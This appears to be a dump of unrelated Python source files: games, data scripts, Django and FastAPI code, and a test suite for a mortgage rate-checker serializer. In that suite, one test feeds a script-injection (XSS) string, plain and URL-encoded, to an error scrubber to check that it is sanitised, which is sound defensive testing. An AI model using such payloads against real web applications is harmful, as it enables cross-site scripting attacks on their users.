return subprocess.call(['git', 'submodule', 'update', '--init', '--recursive'])
def podInstall():
return subprocess.call(['/usr/local/bin/pod', 'install'])
def gitClone(url):
return subprocess.call(['git', 'clone', url])
|
998,347 | 9ffda343e0353600f0758008ed61b73c021907ce | import os
import subprocess
import sys
PATH = os.path.join(sys.exec_prefix, 'Scripts', 'pyuic5.exe')
def main():
for file in os.listdir('.'):
if file.endswith('.ui'):
subprocess.run([PATH, file, '-o', '{}.py.'.format(os.path.splitext(file)[0])])
if __name__ == '__main__':
main()
|
998,348 | d21e4d87e9ff7931d831ae6c20aa13da0e0237ba |
class BlogPost:
def __init__(self , template,iden):
self.template = template
self.id=iden
#self.img=img
def listString(self):
return "<a href=\"/post?page_id=" + str(self.id) + "\"></a>"
def toDict(self):
return {
}
blog_list = [
BlogPost(
"stressfreeme.html" ,
0 ,
) ,
BlogPost(
"thinkingbeing.html" ,
1
) ,
BlogPost(
"Foodieforlife.html" ,
2
) ,
BlogPost(
"Laugh.html" ,
3
) ,
BlogPost(
"fitness_home.html" ,
4
)
]
|
998,349 | ad01954db2ebecad0fd32d44f69fe622772df610 | # -*- coding: utf-8 -*-
"""
Created on Tue May 14 11:03:30 2019
My first attempt at a game in python
This is a racing game.
Game will stop if car crashes
@author: Steven
"""
## preample ##
# import library
import pygame
import time
import random
from os import path
img_dir = path.join(path.dirname(__file__), 'img')
# initiate pygame
pygame.init()
# pygame module for loading and playing sounds
pygame.mixer.init()
# define colors
black = (0, 0, 0)
white = (255, 255, 255)
green = (112, 209, 48)
gray = (109, 109, 109)
beige = (237, 207, 132)
car_width = 100
car_height = 100
carSpeed = 5
## GAME OPTIONS ##
# game resolution
display_width = 800
display_height = 600
rdpaint = [200, 300, 400, 500, 600]
# set size of game display
gameDisplay = pygame.display.set_mode((display_width, display_height))
# title of game window
pygame.display.set_caption('Ghost Driver')
# define game clock
clock = pygame.time.Clock()
# ASSETS
# Load graphics
playerImg = pygame.image.load(path.join(img_dir, 'car.png')).convert_alpha()
# Sprites
class Player(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.transform.scale(playerImg, (car_width, car_height))
self.rect = self.image.get_rect()
self.rect.centerx = display_width / 2
self.rect.bottom = display_height * 0.8
self.speedx = 0
self.speedy = 0
def update(self):
# stops movement when no keys are pressed
self.speedx = 0
self.speedy = 0
# player movement
keystate = pygame.key.get_pressed()
if keystate[pygame.K_LEFT]:
self.speedx = -carSpeed
if keystate[pygame.K_RIGHT]:
self.speedx = carSpeed
self.rect.x += self.speedx
if keystate[pygame.K_UP]:
self.speedy = -carSpeed
if keystate[pygame.K_DOWN]:
self.speedy = carSpeed
self.rect.y += self.speedy
class Object(pygame.sprite.Sprite):
def __init__(self, nr):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load(path.join(img_dir, 'Car_{0}.png'.format(nr))).convert_alpha()
self.image = pygame.transform.flip(self.image, False, True)
self.image = pygame.transform.scale(self.image, (car_width, car_height))
self.rect = self.image.get_rect()
self.rect.x = random.randrange(display_width * 0.25 - self.rect.width / 2,
display_width * 0.75 - self.rect.width / 2)
self.rect.y = random.randrange(-1200, -100)
self.speedy = 6
def update(self):
self.rect.y += self.speedy
if self.rect.top > display_height + 45:
self.rect.x = random.randrange(display_width * 0.25 - self.rect.width / 2,
display_width * 0.75 - self.rect.width / 2)
self.rect.y = random.randrange(-1200, -100)
self.speedy = 6
class Road(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.Surface((display_width * 0.6, display_height))
self.image.fill(gray)
self.rect = self.image.get_rect()
self.rect.centerx = display_width / 2
self.rect.bottom = display_height
class Roadside(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.Surface((display_width * 0.7, display_height))
self.image.fill(beige)
self.rect = self.image.get_rect()
self.rect.centerx = display_width / 2
self.rect.bottom = display_height
class Roadpaint(pygame.sprite.Sprite):
def __init__(self, xloc):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.Surface((5, 30))
self.image.fill(white)
self.rect = self.image.get_rect()
self.rect.centerx = xloc
self.rect.y = -100
self.speedy = 3
def update(self):
self.rect.y += self.speedy
if self.rect.top > display_height:
self.kill()
# Definitions
def time_passed(count):
font = pygame.font.SysFont(None, 25)
text = font.render("Time passed: " + str(count), True, black)
gameDisplay.blit(text, (0, 0))
def distance(cord_x, cord_y, text_loc_y, object):
font = pygame.font.SysFont(None, 25)
text = font.render(str(object) + ": (" + str(cord_x) + ", " + str(cord_y) + ")", True, black)
gameDisplay.blit(text, (0, text_loc_y))
def text_objects(text, font):
textSurface = font.render(text, True, black)
return textSurface, textSurface.get_rect()
font_name = pygame.font.match_font('arial')
def draw_text(surf, text, size, placement_x, placement_y):
font = pygame.font.Font(font_name, size)
text_surface = font.render(text, True, black)
text_rect = text_surface.get_rect()
text_rect.midtop = (placement_x, placement_y)
surf.blit(text_surface, text_rect)
def show_go_screen():
gameDisplay.fill(white)
draw_text(gameDisplay, 'Ghost Driver', 64, display_width / 2, display_height / 4)
draw_text(gameDisplay, 'Arrow keys to move', 32, display_width / 2, display_height / 2)
draw_text(gameDisplay, 'Press any key to start', 24, display_width / 2, display_height * 3 / 4)
pygame.display.flip()
waiting = True
while waiting:
clock.tick(60)
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
if event.type == pygame.KEYUP:
waiting = False
def game_loop():
# game stop parameter
gameExit = False
gameOver = True
n_objects = 7
# game will run so long as crashed is equal to false
while not gameExit:
# define clock / frames per second
clock.tick(80)
if gameOver:
show_go_screen()
gameOver = False
startTime = time.time()
all_sprites = pygame.sprite.Group()
road_sprites = pygame.sprite.Group()
road_paint_sprites = pygame.sprite.Group()
blocks = pygame.sprite.Group()
player = Player()
road = Road()
roadside = Roadside()
road_sprites.add(roadside)
road_sprites.add(road)
all_sprites.add(player)
for i in range(1, n_objects + 1):
m = Object(nr=random.randrange(1, 6))
# overlap = pygame.sprite.spritecollide(m, blocks, False, pygame.sprite.collide_mask)
all_sprites.add(m)
blocks.add(m)
# draw_text(gameDisplay, 'No overlap', 32, display_width / 2, display_height / 2)
timePassed = round((time.time() - startTime), 1)
# spawns road paint
if timePassed % 1 == 0:
for i in range(0, 5):
r = Roadpaint(xloc=rdpaint[i])
road_paint_sprites.add(r)
## EVENTS ##
# gets all events happening in the game cursor movements, key clicks etc.
for event in pygame.event.get():
# if user clicks on 'x' in top right corner, set 'crashed' to True, thereby ending game
if event.type == pygame.QUIT:
pygame.quit()
quit()
## UPDATE GAME STATE ##
# update all_sprites group
all_sprites.update()
road_paint_sprites.update()
# TODO: If object collide then kill() them
# TODO: Change care speed when in ditch
# TODO: Add new objects to ditch
# collision detection
hits = pygame.sprite.spritecollide(player, blocks, False, pygame.sprite.collide_mask)
# hits = pygame.sprite.collide_mask(player, object)
if hits:
gameOver = True
timePassed = round((time.time() - startTime), 4)
## RENDER ###
# background color of game
gameDisplay.fill(green)
# pygame.draw.rect(gameDisplay, white, [display_width/2, display_height/2, 50, 50])
# sprites
road_sprites.draw(gameDisplay)
# road_paint_sprites.draw(gameDisplay)
all_sprites.draw(gameDisplay)
# score
time_passed(timePassed)
# distance
list_blocks = blocks.sprites()
# y_dist = player.rect.top - list_blocks[1].rect.bottom
# x_dist = player.rect.center[0] - list_blocks[1].rect.center[0]
for i in range(0, n_objects):
y_dist = list_blocks[i].rect.center[1]
x_dist = list_blocks[i].rect.center[0]
down = 25 * (i + 1)
distance(x_dist, y_dist, down, "Car " + str(i + 1))
# update display after events
pygame.display.flip()
# run game loop
game_loop()
# stop pygame
pygame.quit()
# stop .py program
quit()
|
998,350 | 4179f2db4e5cc4f0024365344e466e183e0e0f79 | import sqlite3
conn = sqlite3.connect('../sensorData.db')
c = conn.cursor()
def main():
dbPath = '../sensorData.db'
sql_create_sigfox_info_table = """ CREATE TABLE IF NOT EXISTS sigfoxInfo(
)
"""
if __name__ == '__main__':
main()
|
998,351 | 0703ed422004b3bb5a9758521526aa8692ce9dd2 | # Generated by Django 3.2.3 on 2021-07-13 09:46
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='menace',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.CharField(max_length=50, null=True)),
('reference', models.CharField(max_length=50, null=True)),
('description', models.CharField(max_length=50, null=True)),
('access', models.CharField(max_length=50, null=True)),
('acteur', models.CharField(max_length=50, null=True)),
('motivation', models.CharField(max_length=50, null=True)),
('resultat', models.CharField(max_length=50, null=True)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
]
|
998,352 | 1cd1ed3f0731c7b223d58b8320243b2365ff599c | import cv2
from PIL import Image
import matplotlib.pyplot as plt
import h5py
# img = Image.open(
# 'C:\\Users\\PC\\Downloads\\test_Conv\\Convolutional Models\\DatasetCreation\\data_sneakers\\Nike\\Nike Air Bakin_ Posite _ Men_s.png')
# img = cv2.imdecode(img,-1)
# plt.imshow(img)
# plt.show()
# xxx = cv2.cvtColor(cv2.UMat(img), cv2.COLOR_RGBA2BGR)
# plt.imshow(xxx)
# plt.show()
# ii = cv2.imread("C:\\Users\\PC\\Downloads\\test_Conv\\Convolutional Models\\DatasetCreation\\data_sneakers\\Nike\\Nike Air Bakin_ Posite _ Men_s.png")
# gray_image = cv2.cvtColor(ii, cv2.COLOR_RGBA2BGR)
# print(gray_image.shape)
# plt.imshow(gray_image)
# plt.show()
OUTPUT_PATH = 'C:\\Users\\PC\\Downloads\\test_Conv\\Convolutional Models\\DatasetCreation\\data_shoes\\'
ftrain = h5py.File(OUTPUT_PATH + 'train_dataset.h5', 'r')
ftest = h5py.File(OUTPUT_PATH + 'test_dataset.h5', 'r')
# Divido el dataset en datos de entreno y evalucion con respectivas etiquetas
train_data, train_labels = ftest['test_set_x'], ftest['test_set_y']
eval_data, eval_labels = ftrain['train_set_x'], ftrain['train_set_y']
plt.imshow(train_data[4])
plt.show()
plt.imshow(eval_data[21])
plt.show()
|
998,353 | 371e94a0ca7389491dfcb812434f1ff1bfb6513e | import pandas as pd
from openpyxl import load_workbook
import pandas.io.formats.excel
from Creditos_Asignados_Por_Semestre import obtenerListas,agrega_Columna
import numpy as np
import xlrd
#Variables a cargar en memoria
codigos_todas_materias_graduados = []
codigos_materias_por_semestre = []
estado_materias = []
nombre = "../Excel_generados/graduados.xlsx"
openfile = xlrd.open_workbook(nombre)
hoja_materias_por_semestre= openfile.sheet_by_name("materias_graduados")
hoja_todas_materias_graduados = openfile.sheet_by_name("listamaterias_graduados2")
lista_valores =[codigos_todas_materias_graduados]
lista_indices =[2]
lista_tipos=[str]
obtenerListas(hoja_todas_materias_graduados,lista_valores,lista_indices,lista_tipos)
lista_valores =[codigos_materias_por_semestre,estado_materias]
lista_indices =[6,3]
lista_tipos=[str,str]
obtenerListas(hoja_materias_por_semestre,lista_valores,lista_indices,lista_tipos)
reprobados = np.zeros(len(codigos_todas_materias_graduados))
aprobados = np.zeros(len(codigos_todas_materias_graduados))
por_faltas = np.zeros(len(codigos_todas_materias_graduados))
for m in range(len(codigos_todas_materias_graduados)):
for x in range(len(codigos_materias_por_semestre)):
if codigos_todas_materias_graduados[m] == codigos_materias_por_semestre[x]:
if estado_materias[x]== 'RP':
reprobados[m]+= 1
elif estado_materias[x]== 'AP':
aprobados[m]+=1
else:
por_faltas[m]+=1
diccionario = {"aprobados":aprobados,"reprobados":reprobados,"reprobados_por_faltas":por_faltas}
agrega_Columna(nombre,"listamaterias_graduados2",diccionario,4)
vale = len(codigos_materias_por_semestre)
print(aprobados.sum() +por_faltas.sum()+ reprobados.sum() == vale) |
998,354 | d658f703d9edae127b01e3a29e7e383fae38cbca | from decimal import Decimal
from django.test import TestCase
from ratechecker.models import Product
from ratechecker.ratechecker_parameters import ParamsSerializer, scrub_error
class RateCheckerParametersTestCase(TestCase):
def setUp(self):
self.data = {
"price": 240000,
"loan_amount": 200000,
"state": "GA",
"loan_type": "JUMBO",
"minfico": 700,
"maxfico": 800,
"rate_structure": "FIXED",
"loan_term": 30,
}
def test_is_valid__no_args(self):
serializer = ParamsSerializer(data={})
self.assertFalse(serializer.is_valid())
self.assertEqual(len(serializer.errors), 7)
self.assertEqual(
serializer.errors.get("loan_amount"), ["This field is required."]
)
self.assertEqual(
serializer.errors.get("state"), ["This field is required."]
)
self.assertEqual(
serializer.errors.get("loan_type"), ["This field is required."]
)
self.assertEqual(
serializer.errors.get("minfico"), ["This field is required."]
)
self.assertEqual(
serializer.errors.get("maxfico"), ["This field is required."]
)
self.assertEqual(
serializer.errors.get("rate_structure"),
["This field is required."],
)
self.assertEqual(
serializer.errors.get("loan_term"), ["This field is required."]
)
def test_is_valid__valid_args(self):
serializer = ParamsSerializer(data=self.data)
self.assertTrue(serializer.is_valid())
self.assertEqual(
serializer.validated_data.get("price"), Decimal("240000")
)
self.assertEqual(
serializer.validated_data.get("loan_amount"), Decimal("200000")
)
self.assertEqual(serializer.validated_data.get("state"), "GA")
self.assertEqual(serializer.validated_data.get("loan_type"), "JUMBO")
self.assertEqual(serializer.validated_data.get("minfico"), 700)
self.assertEqual(serializer.validated_data.get("maxfico"), 800)
self.assertEqual(
serializer.validated_data.get("rate_structure"), "FIXED"
)
self.assertEqual(serializer.validated_data.get("loan_term"), 30)
def test_is_valid__invalid_lock(self):
self.data["lock"] = 20
serializer = ParamsSerializer(data=self.data)
self.assertFalse(serializer.is_valid())
self.assertEqual(
serializer.errors.get("lock"), ["lock needs to be 30, 45, or 60."]
)
def test_is_valid__lock_default(self):
serializer = ParamsSerializer(data=self.data)
self.assertTrue(serializer.is_valid())
self.assertEqual(
serializer.validated_data.get("lock"), ParamsSerializer.LOCK
)
self.assertEqual(serializer.validated_data.get("min_lock"), 46)
self.assertEqual(serializer.validated_data.get("max_lock"), 60)
def test_is_valid__lock_non_default(self):
self.data["lock"] = 30
self.data["min_lock"] = 0
self.data["max_lock"] = 30
serializer = ParamsSerializer(data=self.data)
self.assertTrue(serializer.is_valid())
self.assertEqual(serializer.validated_data.get("lock"), 30)
self.assertEqual(serializer.validated_data.get("min_lock"), 0)
self.assertEqual(serializer.validated_data.get("max_lock"), 30)
def test_is_valid__points_default(self):
serializer = ParamsSerializer(data=self.data)
self.assertTrue(serializer.is_valid())
self.assertEqual(
serializer.validated_data.get("points"), ParamsSerializer.POINTS
)
def test_is_valid__points_non_default(self):
self.data["points"] = 4
serializer = ParamsSerializer(data=self.data)
self.assertTrue(serializer.is_valid())
self.assertEqual(serializer.validated_data.get("points"), 4)
def test_is_valid__property_type_default(self):
serializer = ParamsSerializer(data=self.data)
self.assertTrue(serializer.is_valid())
self.assertEqual(
serializer.validated_data.get("property_type"),
ParamsSerializer.PROPERTY_TYPE,
)
def test_is_valid__property_type_non_default(self):
self.data["property_type"] = ParamsSerializer.PROPERTY_TYPE_COOP
serializer = ParamsSerializer(data=self.data)
self.assertTrue(serializer.is_valid())
self.assertEqual(
serializer.validated_data.get("property_type"),
ParamsSerializer.PROPERTY_TYPE_COOP,
)
def test_is_valid__property_type_invalid(self):
self.data["property_type"] = "A"
serializer = ParamsSerializer(data=self.data)
self.assertFalse(serializer.is_valid())
self.assertEqual(
serializer.errors.get("property_type"),
['"A" is not a valid choice.'],
)
def test_is_valid__loan_purpose_default(self):
serializer = ParamsSerializer(data=self.data)
self.assertTrue(serializer.is_valid())
self.assertEqual(
serializer.validated_data.get("loan_purpose"),
ParamsSerializer.LOAN_PURPOSE,
)
def test_is_valid__loan_purpose_non_default(self):
self.data["loan_purpose"] = Product.REFI
serializer = ParamsSerializer(data=self.data)
self.assertTrue(serializer.is_valid())
self.assertEqual(
serializer.validated_data.get("loan_purpose"), Product.REFI
)
def test_is_valid__loan_purpose_invalid(self):
self.data["loan_purpose"] = "A"
serializer = ParamsSerializer(data=self.data)
self.assertFalse(serializer.is_valid())
self.assertEqual(
serializer.errors.get("loan_purpose"),
['"A" is not a valid choice.'],
)
def test_is_valid__io_default(self):
serializer = ParamsSerializer(data=self.data)
self.assertTrue(serializer.is_valid())
self.assertEqual(
serializer.validated_data.get("io"), ParamsSerializer.IO
)
def test_is_valid__io_non_default(self):
self.data["io"] = 1
serializer = ParamsSerializer(data=self.data)
self.assertTrue(serializer.is_valid())
self.assertEqual(serializer.validated_data.get("io"), 1)
def test_is_valid__io_invalid(self):
self.data["io"] = 4
serializer = ParamsSerializer(data=self.data)
self.assertFalse(serializer.is_valid())
self.assertEqual(
serializer.errors.get("io"), ["io needs to be 0 or 1."]
)
def test_is_valid__loan_amount_none(self):
self.data["loan_amount"] = None
serializer = ParamsSerializer(data=self.data)
self.assertFalse(serializer.is_valid())
self.assertEqual(
serializer.errors.get("loan_amount"),
["This field may not be null."],
)
def test_is_valid__loan_amount_empty(self):
self.data["loan_amount"] = ""
serializer = ParamsSerializer(data=self.data)
self.assertFalse(serializer.is_valid())
self.assertEqual(
serializer.errors.get("loan_amount"),
["A valid number is required."],
)
def test_is_valid__loan_amount_negative(self):
self.data["loan_amount"] = -10000
serializer = ParamsSerializer(data=self.data)
self.assertTrue(serializer.is_valid())
self.assertEqual(
serializer.validated_data.get("loan_amount"), Decimal("10000")
)
def test_is_valid__price(self):
self.data["price"] = 1000
serializer = ParamsSerializer(data=self.data)
self.assertTrue(serializer.is_valid())
self.assertEqual(serializer.validated_data["price"], Decimal("1000"))
def test_is_valid__price_negative(self):
self.data["price"] = -10000
serializer = ParamsSerializer(data=self.data)
self.assertTrue(serializer.is_valid())
self.assertEqual(
serializer.validated_data.get("price"), Decimal("10000")
)
def test_is_valid__price_zero(self):
self.data["price"] = 0
serializer = ParamsSerializer(data=self.data)
self.assertTrue(serializer.is_valid())
self.assertEqual(serializer.validated_data["price"], Decimal("1"))
def test_is_valid__state_invalid(self):
self.data["state"] = 123
serializer = ParamsSerializer(data=self.data)
self.assertFalse(serializer.is_valid())
self.assertEqual(
serializer.errors.get("state"), ['"123" is not a valid choice.']
)
def test_is_valid__loan_type_invalid(self):
self.data["loan_type"] = "A"
serializer = ParamsSerializer(data=self.data)
self.assertFalse(serializer.is_valid())
self.assertEqual(
serializer.errors.get("loan_type"), ['"A" is not a valid choice.']
)
def test_is_valid__maxfico_smaller(self):
self.data["maxfico"] = 600
self.data["minfico"] = 700
serializer = ParamsSerializer(data=self.data)
self.assertTrue(serializer.is_valid())
self.assertEqual(serializer.validated_data.get("maxfico"), 700)
self.assertEqual(serializer.validated_data.get("minfico"), 600)
def test_is_valid__ficos_negative(self):
self.data["maxfico"] = -100
self.data["minfico"] = -200
serializer = ParamsSerializer(data=self.data)
self.assertTrue(serializer.is_valid())
self.assertEqual(serializer.validated_data.get("maxfico"), 200)
self.assertEqual(serializer.validated_data.get("minfico"), 100)
def test_is_valid__rate_structure_arm_no_arm_type(self):
self.data["rate_structure"] = "ARM"
serializer = ParamsSerializer(data=self.data)
self.assertFalse(serializer.is_valid())
self.assertEqual(
serializer.errors.get("non_field_errors"),
["arm_type is required if rate_structure is ARM."],
)
def test_is_valid__loan_term_not_choice(self):
self.data["loan_term"] = 20
serializer = ParamsSerializer(data=self.data)
self.assertFalse(serializer.is_valid())
self.assertEqual(
serializer.errors.get("loan_term"),
["loan_term needs to be 15 or 30."],
)
def test_is_valid__loan_term_negative(self):
self.data["loan_term"] = -30
serializer = ParamsSerializer(data=self.data)
self.assertTrue(serializer.is_valid())
self.assertEqual(serializer.data.get("loan_term"), 30)
def test_is_valid__ltv__without_ltv(self):
self.data["price"] = 200000
self.data["loan_amount"] = 180000
serializer = ParamsSerializer(data=self.data)
self.assertTrue(serializer.is_valid())
self.assertEqual(serializer.validated_data.get("min_ltv"), 90)
self.assertTrue(
serializer.validated_data.get("min_ltv"),
serializer.validated_data.get("max_ltv"),
)
def test_is_valid__ltv__without_price(self):
data = dict(self.data)
data["ltv"] = 90
data.pop("price", None)
serializer = ParamsSerializer(data=data)
self.assertTrue(serializer.is_valid())
def test_is_valid_only_price_or_ltv_not_both(self):
self.data["price"] = 200000
self.data["loan_amount"] = 180000
self.data["ltv"] = 90.100
serializer = ParamsSerializer(data=self.data)
self.assertFalse(serializer.is_valid())
def test_is_valid_no_price_or_ltv(self):
data = dict(self.data)
data.pop("price", None)
data.pop("ltv", None)
serializer = ParamsSerializer(data=data)
self.assertFalse(serializer.is_valid())
self.assertIn(
"one of price or ltv is required",
serializer.errors["non_field_errors"],
)
def test_error_scrubber(self):
bad_value1 = "CONFFQ684<SCRIPT>ALERT(1)</SCRIPT>"
bad_value2 = r"%3Cscript%3CEalert(1)%3C%2fscript%3E"
for char in ["<", ">", r"%3C", r"%3E"]:
self.assertNotIn(char, scrub_error(bad_value1))
self.assertNotIn(char, scrub_error(bad_value2))
def test_error_scrubber_called_without_is_valid_raises_error(self):
serializer = ParamsSerializer(data=self.data)
with self.assertRaises(AssertionError):
serializer.errors
|
998,355 | baea307ab62477253d28a03e6188c375657ea493 | from django.conf.urls import url
from Test import views
urlpatterns = [
url(r'^snippets/$', views.snippet_list),
#url(r'^snippets/', views.snippet_detail),
] |
998,356 | 537903f2eefce52a87dfbae7ca46ee8ae6a7170a | import astropy.io.fits as fits
import utils.prologue as prologue
from scipy import ndimage
from matplotlib import pyplot as plt
import numpy as np
from utils.mosaic import *
import imageio as imgio
def main(args):
#x_star,y_star = 3274,7977
#radius = 10
x_star,y_star = 3069,7821
radius = 15
#x_star,y_star = 2585,7765
#radius = 5
data = fits.open(args.i)[0].data
scaled_data = scale_image(data[::-1].copy())
star = scaled_data[y_star-radius:y_star+radius, x_star-radius:x_star+radius]
data_convolved = ndimage.convolve(scaled_data, star)
imgio.imwrite('convolved_yx_wihtout_parameter.png', data_convolved)
if __name__ == '__main__':
main(prologue.get_args()) |
998,357 | fd5e848d4aed03a7ffcd7b5bd51e411973a7589d | # Charles Buyas cjb8qf
import random
print("Let's play Tic Tac Toe!\n")
def get_human():
# Lets the player type which letter they want to be.
letter = ''
while not (letter == 'X' or letter == 'O'):
letter = (input("Do you want to be X or O?: ")).upper()
if letter == 'X':
return ['X', 'O']
else:
return ['O', 'X']
def draw_board(board):
# "board" is a list of 10 strings representing the board
print(' ' + board[7] + ' | ' + board[8] + ' | ' + board[9])
print(' ' + board[4] + ' | ' + board[5] + ' | ' + board[6])
print(' ' + board[1] + ' | ' + board[2] + ' | ' + board[3])
def first_move():
# Choose the player who goes first.
move_letter = ''
while not (move_letter == "P" or move_letter == "C"):
move_letter = (str(input("Who goes first? (P or C): "))).upper()
if move_letter == 'C':
return "computer"
else:
return "player"
def empty_space(board, move):
# Return true if the passed move is free on the board
return board[move] == ' '
def get_human_move(board):
# Let the player type in their move.
move = ' '
num_list = [1, 2, 3, 4, 5, 6, 7, 8, 9]
while move not in num_list or not empty_space(board, int(move)):
move = int(input("What is your next move? (1-9): "))
return move
def check_winner(board, letter):
# this function returns true if there is a win
return ((board[7] == letter and board[8] == letter and board[9] == letter) or # across the top
(board[4] == letter and board[5] == letter and board[6] == letter) or # across the middle
(board[1] == letter and board[2] == letter and board[3] == letter) or # across the bottom
(board[7] == letter and board[4] == letter and board[1] == letter) or # down the left side
(board[8] == letter and board[5] == letter and board[2] == letter) or # down the middle
(board[9] == letter and board[6] == letter and board[3] == letter) or # down the right side
(board[7] == letter and board[5] == letter and board[3] == letter) or # diagonal
(board[9] == letter and board[5] == letter and board[1] == letter)) # diagonal
def get_board_copy(board):
# makes a duplicate of the board list
board_copy = []
for i in board:
board_copy.append(i)
return board_copy
def move_list(board, moves):
possible_moves = []
for i in moves:
if empty_space(board, i):
possible_moves.append(i)
if len(possible_moves) != 0:
return random.choice(possible_moves)
else:
return None
def existing_move(board, letter, move):
board[move] = letter
def computer_move(board, computer_letter):
# based on the current board, this determines the computer's move
if computer_letter == 'X':
player_letter = 'O'
else:
player_letter = 'X'
# checks if can win in the next move
for i in range(1, 10):
copy = get_board_copy(board)
if empty_space(copy, i):
existing_move(copy, computer_letter, i)
if check_winner(copy, computer_letter):
return i
# Checks if player could win on next move and blocks the player
for i in range(1, 10):
copy = get_board_copy(board)
if empty_space(copy, i):
existing_move(copy, player_letter, i)
if check_winner(copy, player_letter):
return i
# Plays in the center if the player started in the corner
player_start = move_list(board, [1, 3, 7, 9])
if player_start == True:
if empty_space(board, 5):
return 5
# Try to take one of the corners, if they are free.
move = move_list(board, [1, 3, 7, 9])
if move != None:
return move
# Try to take the center, if it is free.
if empty_space(board, 5):
return 5
# Move on one of the sides.
return move_list(board, [2, 4, 6, 8])
def full_board(board):
# Return True if every space on the board has been taken. Otherwise return False.
for i in range(1, 10):
if empty_space(board, i):
return False
return True
game_is_playing = True
if game_is_playing:
# Reset the board
new_board = [' '] * 10
player_letter, computer_letter = get_human()
turn = first_move()
print('The ' + turn + ' will go first.')
while game_is_playing:
if turn == "player":
# player’s turn
draw_board(new_board)
move = get_human_move(new_board)
existing_move(new_board, player_letter, move)
if check_winner(new_board, player_letter):
draw_board(new_board)
print('Hooray! You have won the game!')
game_is_playing = False
else:
if full_board(new_board):
draw_board(new_board)
print('The game is a tie!')
break
else:
turn = 'computer'
else:
# computer’s turn
move = computer_move(new_board, computer_letter)
existing_move(new_board, computer_letter, move)
if check_winner(new_board, computer_letter):
draw_board(new_board)
print('The computer has beaten you! You lose.')
game_is_playing = False
else:
if full_board(new_board):
draw_board(new_board)
print('The game is a tie!')
break
else:
turn = "player"
|
998,358 | 40abe6762c76e2764d0f35f31473f755e361e2f6 | #Letter Combinations of a Phone Number
import itertools
import sys
def letterCombinations(digits):
"""
:type digits: str
:rtype: List[str]
"""
result = []
dstr = ['', '', 'abc', 'def', 'ghi', 'jkl', 'mno', 'pqrs', 'tuv', 'wxyz']
if digits == '':
return result
for i in dstr[int(digits[0])]:
result.append(i)
if len(digits) == 1:
return result
for i in range(1,len(digits)):
temp = []
istr = dstr[int(digits[i])]
for j in result:
for k in istr:
temp.append(j+k)
result = temp
return result
#print letterCombinations('2')
print letterCombinations(sys.argv[1]) |
998,359 | 811fcdcc7930ec5266875a9b480419d56ee0a7ed | import objects.regulatorObjects as r
r.rConfig.start()
while r.config["filled"] is False:
print("Loading Configurations")
r.rEc.start()
r.rHumWater.start()
r.rLight.start()
r.rMist.start()
r.rMold.start()
r.rNutrition.start()
r.rPH.start()
r.rPHDown.start()
r.rPHUp.start()
r.rRootHum.start()
r.rRootPres.start()
r.rRootTemp.start()
r.rShootHum.start()
r.rShootPres.start()
r.rShootTemp.start()
r.rWaterLevel.start()
r.rUpload.start()
r.rConfig.join()
r.rEc.join()
r.rHumWater.join()
r.rLight.join()
r.rMist.join()
r.rMold.join()
r.rNutrition.join()
r.rPH.join()
r.rPHDown.join()
r.rPHUp.join()
r.rRootHum.join()
r.rRootPres.join()
r.rShootHum.join()
r.rShootPres.join()
r.rShootTemp.join()
r.rWaterLevel.join()
r.rUpload.join()
|
998,360 | 5420c44399b99494c4fd74b9851646fc0e50061f | #PC首页
monetate_icon="//*[@id='monetate_allinone_lightbox']//i[@class='iconfont icon-close']"
search_keyword = "//*[@class='search-box']//input[@name='keywords']"
search_submit ="//*[@class='search-box']//button[@type='submit']"
#搜索结果页
search_result_addbutton = "//*[@class='float_left items']//div[contains(text(),'加入购物车']"
search_result_item="//*[@class='float_left items']//*[@class='item-add_image']/a"
#商品详情页
pdp_scene = "//body"
item_addbutton = "//button[@class='action-add_cart float_left button-solid-yamired-active']"
item_addedText = "//*[@class='popup-modal_content fadeIn addcart-modal_wrapper']//*[@class='addcart-success_modal']/h3"
item_viewcart = "//*[@class='addcart-success_modal']//*[@class='button-view button-lightgray-active']"
#购物车
cart_scene= "//body"
cart_submit = "//*[@class='cart-checkout clearfix']/a"
#登录页
cus_email = "//*[@class='left-container float_left']//input[@type='text']"
cus_password ="//*[@class='left-container float_left']//input[@class='password-input']"
password_frame="//*[@class='left-container float_left']//*[@class='light-input-container wd400']" |
998,361 | 65fbe5a46c2753d44339c5b0c4020b315b743ca5 | import pandas as pd
import matplotlib.pyplot as plt
import random
out_t=pd.read_csv("2_positive_percentage_fragmentswise_for_last_year_shampoo.csv")
#lis= ["l'oreal",'Dove',"Pantene"]
lis= ["l'oreal",'Dove',"Head & Shoulders"]
out_t = out_t[out_t['Brand_name'].isin(lis)]
x1 = list(out_t.Month.unique())
br = out_t.Brand_name.unique()
y1=[]
y2=[]
i=0
f , plt1 = plt.subplots(2,1)
plt2 = plt1.flatten()
j=0
n=4
for b1 in br:
print (b1)
if b1 not in "Head & Shoulders":
b2 = ["Pa",b1]
for b in b2:
print b
rev = out_t[out_t.Brand_name == b]
x2 = list(rev.Month.unique())
y2=[]
for i in range(1,13):
if i in x2:
for row in rev.to_dict("records"):
if row['Month'] == i:
y2.append(row['positive'])
else:
y2.append(0)
print y2,b
plt2[j].plot(x1, y2, label = b)
j=j+1
#plt1.xlabel('Months')
# naming the y axis
#plt1.ylabel('Positive percentage')
for ax in plt1.flat:
ax.set(xlabel='Months', ylabel='%pos')
ax.legend()
# show a legend on the plot
# function to show the plot
plt.show()
|
998,362 | ec17adc6700ea89b58266dff234f968cea277815 | from fastapi import FastAPI
import uvicorn
app = FastAPI()
@app.get("/")
async def root():
return {"grade": "good", "url": "https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FkIqsC%2FbtqEGT92fDc%2FHdq9Qowhgxvbrn94igvzMK%2Fimg.png"}
@app.get("/1/")
async def good():
